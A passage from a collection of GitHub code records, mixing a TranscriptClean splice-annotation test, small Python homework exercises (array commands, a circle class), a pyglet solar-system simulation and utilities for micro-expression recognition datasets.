\"\"\"\n\n sj_file = \"input_files/toy_sjs_mixed_chroms.txt\"\n chroms = set([\"chr18\"])\n tmp_dir = \"scratch/sj_reading_test/\"\n os.system(\"mkdir -p \" + tmp_dir)\n\n assert pytest.warns(Warning, TC.processSpliceAnnotation, sj_file,\n tmp_dir, chroms, process=\"test\")\n\n def test_splice_donors(self):\n \"\"\" Make sure that the correct positions got labeled as splice donors \"\"\"\n\n sj_file = \"input_files/toy_sjs_mixed_chroms.txt\"\n chroms = set([\"chr1\", \"chr2\"])\n tmp_dir = \"scratch/sj_reading_test/\"\n os.system(\"mkdir -p \" + tmp_dir)\n\n donor_bt, accept_bt, annot = TC.processSpliceAnnotation(sj_file, tmp_dir,\n chroms, process=\"test\")\n\n # Remember, file is 1-based but BedTool is 0-based\n expected_donors = set([99, 399])\n\n assert set(donor_bt.Start) == expected_donors\n\n # donors = set()\n # for donor in donor_bt:\n # donors.add(donor.start)\n # assert donors == expected_donors\n\n def test_splice_acceptors(self):\n \"\"\" Make sure that the correct positions got labeled as splice acceptors \"\"\"\n\n sj_file = \"input_files/toy_sjs_mixed_chroms.txt\"\n chroms = set([\"chr1\", \"chr2\"])\n tmp_dir = \"scratch/sj_reading_test/\"\n os.system(\"mkdir -p \" + tmp_dir)\n\n donor_bt, accept_bt, annot = TC.processSpliceAnnotation(sj_file, tmp_dir,\n chroms, process=\"test\")\n\n # Remember, file is 1-based but BedTool is 0-based\n expected_acc = set([199, 299])\n assert set(accept_bt.Start) == expected_acc\n\n # acceptors = set()\n # for acc in accept_bt:\n # acceptors.add(acc.start)\n # assert acceptors == expected_acc\n","repo_name":"mortazavilab/TranscriptClean","sub_path":"testing_suite/test_process_splice_annotation.py","file_name":"test_process_splice_annotation.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"35"} +{"seq_id":"13452271043","text":"array = list(map(lambda x: int(x), input().split()))\ndata = input()\nwhile not data == \"end\":\n data = data.split()\n command = data[0]\n if command == \"swap\":\n index1 = int(data[1])\n index2 = int(data[2])\n array[index1], array[index2] = array[index2], array[index1]\n elif command == \"multiply\":\n index1 = int(data[1])\n index2 = int(data[2])\n array[index1] *= array[index2]\n elif command == \"decrease\":\n array = [num - 1 for num in array]\n\n data = input()\nprint(*array, sep=\", \")","repo_name":"astankin/Python-Fundamentals","sub_path":"Fundamentals-MidExamPreparation2022/World_Tour.py","file_name":"World_Tour.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41298023927","text":"\"\"\"\nЗадача 3. Круг\nЧто нужно сделать\nНа координатной плоскости рисуются круги, у каждого круга следующие параметры: координаты X и Y центра круга и значение\nR ― радиус круга. По умолчанию центр находится в (0, 0), а радиус равен 1.\n\nРеализуйте класс «Круг», который инициализируется по этим параметрам. 
Круг также может:\nНаходить и возвращать свою площадь.\nНаходить и возвращать свой периметр.\nУвеличиваться в K раз.\nОпределять, пересекается ли он с другой окружностью.\n\"\"\"\n\n\nimport math\n\nclass Circle():\n    '''Добавляем данные по окружности (х,у,r)'''\n\n    def __init__(self, x, y, r):\n        self.x = x\n        self.y = y\n        self.r = r\n\n    def area_search(self):\n        '''Находит и выводит площадь окружности'''\n        self.square = math.pi * self.r ** 2\n\n    def perimeter_search(self):\n        '''Находит периметр'''\n        self.perimeter = 2 * math.pi * self.r\n\n    def increase(self):\n        '''Увеличить в К раз'''\n        k = int(input('Восколько раз увеличить окружность: '))\n        self.r = self.r * k\n        print('Изменение окружности после увеличения.')\n        self.area_search()\n        self.perimeter_search()\n        self.print_circle()\n\n    def intersection(self):\n        '''Проверяем пересечение окружностей.'''\n        self.distance = ((circle_1.x - circle_2.x) ** 2 + (circle_1.y - circle_2.y) ** 2)\n        if self.distance == 0:\n            print('Окружность 1 входит в окружность 2' if circle_1.r > circle_2.r else 'Окружность 2 входит в окружность 1')\n        elif self.distance < (circle_1.r + circle_2.r) ** 2:\n            print('Окружности пересекаются.')\n        else:\n            print('Окружности не пересекаются.')\n\n    def print_circle(self):\n        '''Вывод на экран'''\n        print('Площадь окружности: {}\\nПериметр окружности: {}\\n\\n'.format(self.square, self.perimeter))\n\n\n    def launching_programm(self):\n        '''Запуск программы'''\n        self.area_search()\n        self.perimeter_search()\n        self.print_circle()\n        self.increase()\n        self.intersection()\n\n\ncircle_1 =Circle(4, 3, 3)\ncircle_2 =Circle(0, 0, 1)\ncircle_1.launching_programm()\ncircle_2.launching_programm()\n\n\n\n","repo_name":"ZinovkinIgor/-Skillbox","sub_path":"Модуль 24/Домашнее задание/task 3.py","file_name":"task 3.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"27340934838","text":"from math import cos, sin\n\nimport pyglet\nfrom fishpy.geometry import Point2D, Vector2D\n\nfrom body import Body, BodyType\n\nFPS = 120\n\nWINDOW_SIZE = Point2D(1000, 1000)\n\n\nwindow = pyglet.window.Window(\n    width=WINDOW_SIZE.x, height=WINDOW_SIZE.y, resizable=False)\nbatch = pyglet.graphics.Batch()\ncenter = WINDOW_SIZE/2\n# sun = pyglet.shapes.Circle(center.x, center.y, radius=100,\n#                            color=[255, 255, 0, 2], batch=batch)\n\nsun = Body(100, color=(255, 255, 0), pos=center,\n           type=BodyType.SUN, static=False, batch=batch)\nplanet1 = Body(15, color=(0, 255, 128), pos=center+Point2D(450, 0),\n               type=BodyType.PLANET, batch=batch, vel=Vector2D(0, -1.5))\nplanet2 = Body(10, color=(200, 10, 50), pos=center-Point2D(300, 0),\n               type=BodyType.PLANET, batch=batch, vel=Vector2D(0, 2))\nmoon = Body(2, color=(200, 200, 200), pos=planet1.position+Point2D(30, 0),\n            type=BodyType.MOON, batch=batch, vel=Vector2D(0, -2))\n\nbodies = [sun, planet1, planet2, moon]\n\n\ndef update(dt):\n    # Step each body exactly once per frame and accumulate gravity from every\n    # other body; the moon is handled by the same loop as the sun and planets.\n    for i, body in enumerate(bodies):\n        body.step()\n        body.gravitational_acceleration(bodies[:i]+bodies[i+1:])\n\n    window.clear()\n    batch.draw()\n\n\nif __name__ == '__main__':\n    pyglet.clock.schedule_interval(update, 1/FPS)\n
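# Body (defined in body.py, which is not shown in this record) is assumed to\n    # integrate simple Newtonian point-mass gravity: gravitational_acceleration()\n    # accumulates the pull of the other bodies, and step() then advances the\n    # position by the velocity once per scheduled update.\n   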
pyglet.app.run()\n","repo_name":"TheBiggerFish/PygletFun","sub_path":"SolarSystemSim/solar_system.py","file_name":"solar_system.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35429108482","text":"import numpy as np\nimport sys\nimport math\nimport operator\nimport csv\nimport glob,os\nimport xlrd\nimport cv2\nimport pandas as pd\nimport os\nimport glob\n# import matplotlib.pyplot as plt\n\nfrom sklearn.svm import SVC\nfrom collections import Counter\nfrom sklearn.metrics import confusion_matrix\nimport scipy.io as sio\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import LSTM, Dense, TimeDistributed\nfrom keras.utils import np_utils\nfrom keras import metrics\nfrom keras import backend as K\nfrom keras.models import model_from_json\nimport keras\nimport pydot, graphviz\nfrom keras.utils import np_utils, plot_model\nfrom keras.preprocessing import image as img\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.applications.resnet50 import preprocess_input as res_preprocess_input\n\n# from simple_test_image_cutting import cut_algorithm_call_all\n\nfrom labelling import collectinglabel\n# from reordering import readinput\nfrom evaluationmatrix import fpr\nimport itertools\n# from pynvml.pynvml import *\n\nimport tensorflow as tf\nfrom sklearn.decomposition import PCA\nimport imblearn.under_sampling as under_sampling\nimport matplotlib.pyplot as plt\n\ndef read_image(root_dir, db, table):\n\tdata_path = root_dir + db + \"/\" + db + \"/\"\n\timg_list = []\n\tsubj_for_loso = \"\"\n\timg_list_subpartitioning = []\n\n\tlabel_list = []\n\tlabel_list_subpartitioning = []\n\t\n\tfor item in table:\n\n\t\tif 'SAMM' in db:\n\t\t\tsubj = (item[0])[0:3]\n\t\t\tif len(item[0]) < 4:\n\t\t\t\tvid = item[1]\n\t\t\t\tlabel = item[-1]\n\t\t\telse:\n\t\t\t\tvid = item[0]\n\t\t\t\tlabel = item[-1] - 1\n\n\n\n\n\t\telif 'SMIC' in db:\n\t\t\tsubj = (item[0])[1:3]\n\t\t\tif 's' not in subj:\n\t\t\t\tsubj = \"s\" + subj\n\t\t\telse:\n\t\t\t\tsubj = subj\n\n\t\t\tif len(item[0]) < 4:\n\t\t\t\tvid = item[1]\n\t\t\t\tlabel = int(item[-1])\n\t\t\telse:\n\t\t\t\tvid = item[0]\n\t\t\t\tlabel = int(item[-1] - 1)\n\n\n\t\telif 'CASME' in db:\n\t\t\tif 'sub' not in item[0]:\n\t\t\t\tsubj = \"sub\" + item[0]\n\t\t\t\tlabel = item[-1] - 1\n\t\t\telse:\n\t\t\t\tsubj = item[0]\n\t\t\t\tlabel = item[-1]\n\t\t\tvid = item[1]\n\n\t\telif 'ratio' in db:\n\t\t\tif 'sub' not in item[0]:\n\t\t\t\tsubj = \"sub\" + item[0]\n\t\t\t\tlabel = item[-1] - 1\n\t\t\telse:\n\t\t\t\tsubj = item[0]\n\t\t\t\tlabel = item[-1]\n\t\t\tvid = item[1]\n\n\n\t\t# initialization\n\t\tif subj_for_loso == \"\":\n\t\t\tsubj_for_loso = subj\t\n\n\t\t# push in for first and 2nd subj\n\t\tif subj_for_loso != subj and len(img_list_subpartitioning) > 0:\n\n\t\t\tsubj_for_loso = subj\n\t\t\timg_list += [img_list_subpartitioning]\n\t\t\tlabel_list += [label_list_subpartitioning]\n\t\t\timg_list_subpartitioning = []\n\t\t\tlabel_list_subpartitioning = []\n\t\t\t\n\n\t\tfolder_path = data_path + subj + \"/\" + vid + \"/\"\n\t\tfiles = os.listdir(folder_path)\n\t\t\n\t\tfor file in files:\n\n\t\t\ttemp = folder_path + file\n\n\t\t\timg_list_subpartitioning += [temp]\n\t\t\tlabel_list_subpartitioning += [label]\n\t\t\n\t# push in for last subj\n\timg_list += [img_list_subpartitioning]\n\tlabel_list += [label_list_subpartitioning]\n\n\treturn img_list, label_list\n\ndef create_generator_nonLOSO(x, y, classes, net = 'vgg', 
spatial_size = 224, train_phase=True):\n\t# Note: Test will be done separately from Training\n\n\t# Filter out only Training Images and Labels\n\t\n\t# Read and Yield\n\tX = []\n\tY = []\n\tnon_binarized_Y = []\n\n\tfor subj_counter in range(len(x)):\n\t\t# train case\n\t\tif train_phase:\n\n\t\t\tfor each_file in x[subj_counter]:\n\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\timage = img.img_to_array(image)\n\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\tif net == 'res':\n\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\telif net == 'vgg':\n\t\t\t\t\timage = preprocess_input(image) # vgg way\n\t\t\t\tX += [image]\n\n\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\tfor each_label in temp_y:\n\t\t\t\t# Y.append(each_label)\n\t\t\t\tY += [each_label]\n\n\t\t\tfor item in y[subj_counter]:\n\t\t\t\tnon_binarized_Y += [item]\t\t\t\t\t\n\n\n\tX = np.vstack(X)\n\tY = np.vstack(Y)\n\n\n\tif train_phase:\n\t\t# print(non_binarized_Y)\n\t\tnon_binarized_Y = np.vstack(non_binarized_Y) # for sklearn\n\n\t\tyield X, Y, non_binarized_Y\n\telse:\n\t\tnon_binarized_Y = np.vstack(non_binarized_Y) # for sklearn\n\t\tyield X, Y, non_binarized_Y\n\n\ndef create_generator_LOSO_sequence(x, y, classes, sub, net='vgg', spatial_size=224, train_phase='true', sequence_len = 10):\n\t# Note: Test will be done separately from Training\n\n\t# Filter out only Training Images and Labels\n\t\n\t# Read and Yield\n\tX = []\n\tY = []\n\tnon_binarized_Y = []\n\n\n\tfor subj_counter in range(len(x)):\n\t\t# train case\n\t\tif train_phase == 'true':\n\t\t\tprint(\"TRAIN PHASE TRUE\")\n\t\t\tif subj_counter != sub:\n\t\t\t\tone_frame = []\n\n\t\t\t\tfor each_file in x[subj_counter]:\n\n\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\timage = img.img_to_array(image)\n\n\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\timage = preprocess_input(image)\n\n\t\t\t\t\tone_frame += [image]\n\n\n\t\t\t\tone_vid = np.stack(one_vid, axis=0)\n\t\t\t\t# print(one_vid.shape)\n\t\t\t\tX += [one_frame]\n\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\t# Y.append(each_label)\n\t\t\t\t\tY += [each_label]\n\n\t\t# for svc case\n\t\telif train_phase == 'svc':\n\t\t\tif subj_counter != sub:\n\t\t\t\tone_frame = []\n\t\t\t\tone_vid = []\n\t\t\t\tone_vid_labels = []\n\t\t\t\tseq_counter = 0\n\n\t\t\t\tfor each_vid in x[subj_counter]:\n\n\t\t\t\t\tfor each_file in each_vid:\n\t\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\t\timage = img.img_to_array(image)\n\t\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\t\timage = preprocess_input(image)\n\t\t\t\t\t\timage = np.transpose(image, (1, 2, 3, 0))\n\n\t\t\t\t\t\tone_vid += [image]\n\t\t\t\t\t\tone_vid_labels += []\n\t\t\t\t\t\tseq_counter += 1\n\n\t\t\t\t\t\t\n\t\t\t\t\t\tif seq_counter / (sequence_len) == 1:\n\t\t\t\t\t\t\tone_vid = np.stack(one_vid, axis = -1)\n\t\t\t\t\t\t\tone_vid = np.reshape(one_vid, (one_vid.shape[0], one_vid.shape[1], one_vid.shape[2], one_vid.shape[-1]))\t\n\t\t\t\t\t\t\tX += [one_vid]\t\t\t\t\t\n\t\t\t\t\t\t\tone_vid = []\n\t\t\t\t\t\t\tone_vid_labels = []\n\t\t\t\t\t\t\tseq_counter = 0\n\t\t\t\t\t\t\t# 
print(one_vid)\n\t\t\t\t\t\t\t\t\t\t\n\n\n\t\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\t\t# non_binarized_Y += [y[subj_counter]]\n\n\t\t\t\tfor item in y[subj_counter]:\n\t\t\t\t\tnon_binarized_Y += [item]\n\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\tY += [each_label]\t\t\t\n\n\n\t\t# test case\n\t\telse:\n\t\t\tif subj_counter == sub:\n\t\t\t\tone_frame = []\n\t\t\t\tone_vid = []\n\t\t\t\tseq_counter = 0\n\n\t\t\t\tfor each_vid in x[subj_counter]:\n\t\t\t\t\tfor each_file in each_vid:\n\t\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\t\t# print(image)\n\t\t\t\t\t\timage = img.img_to_array(image)\n\t\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\t\timage = preprocess_input(image)\n\t\t\t\t\t\timage = np.transpose(image, (1, 2, 3, 0))\n\n\t\t\t\t\t\tone_vid += [image]\n\t\t\t\t\t\tseq_counter += 1\n\t\t\t\t\t\t\n\t\t\t\t\t\tif seq_counter / (sequence_len) == 1:\n\t\t\t\t\t\t\tone_vid = np.stack(one_vid, axis = -1)\n\t\t\t\t\t\t\tone_vid = np.reshape(one_vid, (one_vid.shape[0], one_vid.shape[1], one_vid.shape[2], one_vid.shape[-1]))\t\n\t\t\t\t\t\t\t# print(one_vid.shape)\n\t\t\t\t\t\t\tX += [one_vid]\t\t\t\t\t\n\t\t\t\t\t\t\tone_vid = []\n\t\t\t\t\t\t\tseq_counter = 0\n\t\t\t\t\t\t\t# print(one_vid)\n\n\n\n\t\t\t\t\t# one_vid = np.stack(one_vid, axis = -1)\n\t\t\t\t\t# one_vid = np.reshape(one_vid, (one_vid.shape[0], one_vid.shape[1], one_vid.shape[2], one_vid.shape[-1]))\t\n\t\t\t\t\t# X += [one_vid]\t\n\n\t\t\t\t# temp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\t# for each_label in temp_y:\n\t\t\t\t# \t# Y.append(each_label)\n\t\t\t\t# \tY += [each_label]\t\t\t\n\t\t\t\t# \tnon_binarized_Y += [y[subj_counter]]\n\t\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\n\t\t\t\tfor item in y[subj_counter]:\n\t\t\t\t\tnon_binarized_Y += [item]\n\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\tY += [each_label]\t\t\t\t\t\t\t\n\n\n\tX = np.asarray(X)\n\tX = np.rollaxis(X, axis=4, start=1)\n\t# print(X)\n\t# print(X.shape)\n\n\n\tY = np.vstack(Y)\n\t# Y = Y[::sequence_len]\n\ty = np.asarray(Y)\n\t# non_binarized_Y = non_binarized_Y[::sequence_len]\n\tnon_binarized_Y = np.asarray(non_binarized_Y)\n\t# print(X.shape)\n\t# print(y)\n\t# print(y.shape)\n\t# print(non_binarized_Y)\n\t# print(non_binarized_Y.shape)\n\n\tif train_phase == 'true':\n\t\tyield X, Y\n\telif train_phase == 'svc':\n\t\tyield X, Y, non_binarized_Y\n\telse:\n\t\tnon_binarized_Y = np.vstack(non_binarized_Y) # for sklearn\n\t\tyield X, Y, non_binarized_Y\n\n\ndef create_generator_LOSO_image_cutting_augmentation(x, y, classes, sub, net='vgg', spatial_size=224, train_phase='true'):\n\t# Note: Test will be done separately from Training\n\n\t# Filter out only Training Images and Labels\n\n\t# Read and Yield\n\tX = []\n\tY = []\n\tnon_binarized_Y = []\n\n\tfor subj_counter in range(len(x)):\n\n\t\tif train_phase == 'svc':\n\t\t\tif subj_counter != sub:\n\t\t\t\tfor file_counter in range(len(x[subj_counter])):\n\t\t\t\t\teach_file = (x[subj_counter])[file_counter]\n\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\timage = img.img_to_array(image)\n\n\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\n\t\t\t\t\t# codes for augmentation\n\t\t\t\t\taug_img_arr = cut_algorithm_call_all(cut_interval=[2, 4], spatial_size=spatial_size, 
img=image)\n\t\t\t\t\t\n\t\t\t\t\tfor single_img in aug_img_arr:\n\t\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\t\timage = res_preprocess_input(single_img)\n\t\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\t\timage = preprocess_input(single_img)\n\t\t\t\t\t\tX += [image]\n\n\t\t\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\t\t\tnon_binarized_Y += [ (y[subj_counter])[file_counter] ]\n\t\t\t\t\t\tY += [temp_y[file_counter]]\n\n\t\t\n\n\t\t# test case\n\t\telse:\n\t\t\tif subj_counter == sub:\n\t\t\t\t# print(x)\n\t\t\t\tfor each_file in x[subj_counter]:\n\n\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\t# print(image)\n\t\t\t\t\timage = img.img_to_array(image)\n\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\timage = preprocess_input(image)\n\t\t\t\t\tX += [image]\n\n\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\tY += [each_label]\t\t\t\n\t\t\t\t\tnon_binarized_Y += [y[subj_counter]]\n\n\tX = np.vstack(X)\n\tY = np.vstack(Y)\n\n\tif train_phase == 'svc':\n\t\tyield X, Y, non_binarized_Y\n\telse:\n\t\tnon_binarized_Y = np.vstack(non_binarized_Y) # for sklearn\n\t\tyield X, Y, non_binarized_Y\n\n\ndef create_generator_LOSO(x, y, classes, sub, net='vgg', spatial_size=224, train_phase='true'):\n\t# Note: Test will be done separately from Training\n\n\t# Filter out only Training Images and Labels\n\n\t# Read and Yield\n\tX = []\n\tY = []\n\tnon_binarized_Y = []\n\n\tfor subj_counter in range(len(x)):\n\n\t\tif train_phase == 'svc':\n\t\t\tif subj_counter != sub:\n\t\t\t\tfor each_file in x[subj_counter]:\n\n\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\timage = img.img_to_array(image)\n\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\timage = preprocess_input(image)\n\t\t\t\t\tX += [image]\n\n\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\n\t\t\t\tfor item in y[subj_counter]:\n\t\t\t\t\tnon_binarized_Y += [item]\n\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\tY += [each_label]\t\t\t\n\n\t\t# test case\n\t\telse:\n\t\t\tif subj_counter == sub:\n\t\t\t\t# print(x)\n\t\t\t\tfor each_file in x[subj_counter]:\n\n\t\t\t\t\timage = img.load_img(each_file, target_size=(spatial_size, spatial_size))\n\t\t\t\t\t# print(image)\n\t\t\t\t\timage = img.img_to_array(image)\n\t\t\t\t\timage = np.expand_dims(image, axis=0)\n\t\t\t\t\tif net == 'res':\n\t\t\t\t\t\timage = res_preprocess_input(image)\n\t\t\t\t\telif net == 'vgg':\n\t\t\t\t\t\timage = preprocess_input(image)\n\t\t\t\t\tX += [image]\n\n\t\t\t\ttemp_y = np_utils.to_categorical(y[subj_counter], classes)\n\t\t\t\tfor each_label in temp_y:\n\t\t\t\t\tY += [each_label]\t\t\t\n\t\t\t\t\tnon_binarized_Y += [y[subj_counter]]\n\n\tX = np.vstack(X)\n\tY = np.vstack(Y)\n\n\tif train_phase == 'svc':\n\t\tyield X, Y, non_binarized_Y\n\telse:\n\t\tnon_binarized_Y = np.vstack(non_binarized_Y) # for sklearn\n\t\tyield X, Y, non_binarized_Y\n\n\ndef data_loader_with_LOSO(subject, SubjectPerDatabase, y_labels, subjects, classes):\n\tTrain_X = []\n\tTrain_Y = []\n\n\n\tTest_X = np.array(SubjectPerDatabase[subject])\n\tTest_Y = np_utils.to_categorical(y_labels[subject], classes)\n\tTest_Y_gt = y_labels[subject]\n\n\t########### 
Leave-One-Subject-Out ###############\n\tif subject==0:\n\t\tfor i in range(1,subjects):\n\t\t\tTrain_X.append(SubjectPerDatabase[i])\n\t\t\tTrain_Y.append(y_labels[i])\n\telif subject==subjects-1:\n\t\tfor i in range(subjects-1):\n\t\t\tTrain_X.append(SubjectPerDatabase[i])\n\t\t\tTrain_Y.append(y_labels[i])\n\telse:\n\t\tfor i in range(subjects):\n\t\t\tif subject == i:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tTrain_X.append(SubjectPerDatabase[i])\n\t\t\t\tTrain_Y.append(y_labels[i])\t\n\t##################################################\n\n\n\t############ Conversion to numpy and stacking ###############\n\tTrain_X=np.vstack(Train_X)\n\tTrain_Y=np.hstack(Train_Y)\n\tTrain_Y=np_utils.to_categorical(Train_Y, classes)\n\t#############################################################\n\n\treturn Train_X, Train_Y, Test_X, Test_Y, Test_Y_gt\n\n\ndef duplicate_channel(X):\n\n\tX = np.repeat(X, 3, axis=3)\n\t# np.set_printoptions(threshold=np.nan)\n\t# print(X)\n\tprint(X.shape)\n\n\treturn X\n\ndef record_scores(workplace, dB, ct, sub, order, tot_mat, n_exp, subjects):\n\tif not os.path.exists(workplace+'Classification/'+'Result/'+dB+'/'):\n\t\tos.mkdir(workplace+'Classification/'+ 'Result/'+dB+'/')\n\t\t\n\twith open(workplace+'Classification/'+ 'Result/'+dB+'/sub_CT.txt','a') as csvfile:\n\t\t\tthewriter=csv.writer(csvfile, delimiter=' ')\n\t\t\tthewriter.writerow('Sub ' + str(sub+1))\n\t\t\tthewriter=csv.writer(csvfile,dialect=csv.excel_tab)\n\t\t\tfor row in ct:\n\t\t\t\tthewriter.writerow(row)\n\t\t\tthewriter.writerow(order)\n\t\t\tthewriter.writerow('\\n')\n\t\t\t\n\tif sub==subjects-1:\n\t\t\t# compute the accuracy, F1, P and R from the overall CT\n\t\t\tmicroAcc=np.trace(tot_mat)/np.sum(tot_mat)\n\t\t\t[f1,p,r]=fpr(tot_mat,n_exp)\n\t\t\tprint(tot_mat)\n\t\t\tprint(\"F1-Score: \" + str(f1))\n\t\t\t# save into a .txt file\n\t\t\twith open(workplace+'Classification/'+ 'Result/'+dB+'/final_CT.txt','w') as csvfile:\n\t\t\t\tthewriter=csv.writer(csvfile,dialect=csv.excel_tab)\n\t\t\t\tfor row in tot_mat:\n\t\t\t\t\tthewriter.writerow(row)\n\t\t\t\t\t\n\t\t\t\tthewriter=csv.writer(csvfile, delimiter=' ')\n\t\t\t\tthewriter.writerow('micro:' + str(microAcc))\n\t\t\t\tthewriter.writerow('F1:' + str(f1))\n\t\t\t\tthewriter.writerow('Precision:' + str(p))\n\t\t\t\tthewriter.writerow('Recall:' + str(r))\t\t\t\n\ndef loading_smic_labels(root_db_path, dB):\n\n\tlabel_filename = \"SMIC_label.xlsx\"\n\n\tlabel_path = root_db_path + dB + \"/\" + label_filename\n\tlabel_file = pd.read_excel(label_path)\n\tlabel_file = label_file.dropna()\n\n\tsubject = label_file[['Subject']]\n\tfilename = label_file[['Filename']]\n\tlabel = label_file[['Label']]\n\tnum_frames = label_file[['Frames']]\n\n\t# print(label_file)\n\treturn subject, filename, label, num_frames\n\ndef loading_samm_labels(root_db_path, dB, objective_flag):\n\tlabel_filename = 'SAMM_Micro_FACS_Codes_v2.xlsx'\n\n\tlabel_path = root_db_path + dB + \"/\" + label_filename\n\tlabel_file = pd.read_excel(label_path, converters={'Subject': lambda x: str(x)})\n\t# remove class 6, 7\n\t# if objective_flag:\n\t\t# print(objective_flag)\n\t\t# label_file = label_file.ix[label_file['Objective Classes'] < 6]\n\n\tsubject = label_file[['Subject']]\n\tfilename = label_file[['Filename']]\n\tlabel = label_file[['Estimated Emotion']]\n\tobjective_classes = label_file[['Objective Classes']]\n\n\treturn subject, filename, label, objective_classes\n\ndef loading_casme_labels(root_db_path, dB):\n\tlabel_filename = 'CASME2_label_Ver_2.xls'\n\n\tlabel_path = 
root_db_path + dB + \"/\" + label_filename\n\t# print(label_path)\n\tlabel_file = pd.read_excel(label_path, converters={'Subject': lambda x: str(x)})\n\n\t# remove class others\n\t# label_file = label_file.ix[label_file['Objective Class'] < 6]\n\t# print(len(label_file)) # 185 samples\n\n\tsubject = label_file[['Subject']]\n\tfilename = label_file[['Filename']]\n\texpression_classes = label_file[['Estimated Emotion']]\n\n\treturn subject, filename, expression_classes\n\n\ndef loading_casme_table(root_db_path, dB):\n\tsubject, filename, expression_classes = loading_casme_labels(root_db_path, dB)\n\t\n\tsubject = subject.values\n\tfilename = filename.values\n\texpression_classes = expression_classes.values\n\n\ttable = np.transpose( np.array( [subject, filename, expression_classes] ) )\n\n\treturn table\n\n\n\ndef loading_smic_table(root_db_path, dB):\n\tsubject, filename, label, num_frames = loading_smic_labels(root_db_path, dB)\n\tfilename = filename.values\n\tlabel = label.values\n\n\ttable = np.transpose( np.array( [filename, label] ) )\t\n\treturn table\t\n\n\ndef loading_samm_table(root_db_path, dB, objective_flag):\t\n\tsubject, filename, label, objective_classes = loading_samm_labels(root_db_path, dB, objective_flag)\n\t# print(\"subject:%s filename:%s label:%s objective_classes:%s\" %(subject, filename, label, objective_classes))\n\tsubject = subject.values\n\tfilename = filename.values\n\tlabel = label.values\n\tobjective_classes = objective_classes.values\n\ttable = np.transpose( np.array( [filename, label] ) )\n\ttable_objective = np.transpose( np.array( [subject, filename, objective_classes] ) )\n\t# print(table)\n\treturn table, table_objective\n\n\n\nclass LossHistory(keras.callbacks.Callback):\n\tdef on_train_begin(self, logs={}):\n\t\tself.losses = []\n\t\tself.accuracy = []\n\t\tself.epochs = []\n\tdef on_epoch_end(self, epoch, logs={}):\n\t\tself.losses.append(logs.get('loss'))\n\t\tself.accuracy.append(logs.get('activation_1_categorical_accuracy'))\t\t\n\t\t# self.accuracy.append(logs.get('categorical_accuracy'))\n\t\tself.epochs.append(logs.get('epochs'))\n\n\n\ndef record_loss_accuracy(db_home, train_id, db, history_callback):\n\tfile_loss = open(db_home + 'Classification/' + 'Result/' + db + '/loss_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(history_callback.losses) + \"\\n\")\n\tfile_loss.close()\n\n\tfile_loss = open(db_home + 'Classification/' + 'Result/' + db + '/accuracy_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(history_callback.accuracy) + \"\\n\")\n\tfile_loss.close()\t\n\n\tfile_loss = open(db_home + 'Classification/' + 'Result/'+ db + '/epoch_' + str(train_id) + '.txt', 'a')\n\tfile_loss.write(str(history_callback.epochs) + \"\\n\")\n\tfile_loss.close()\t\t\n\ndef epoch_analysis(db_home, train_id, db, f1, war, uar, 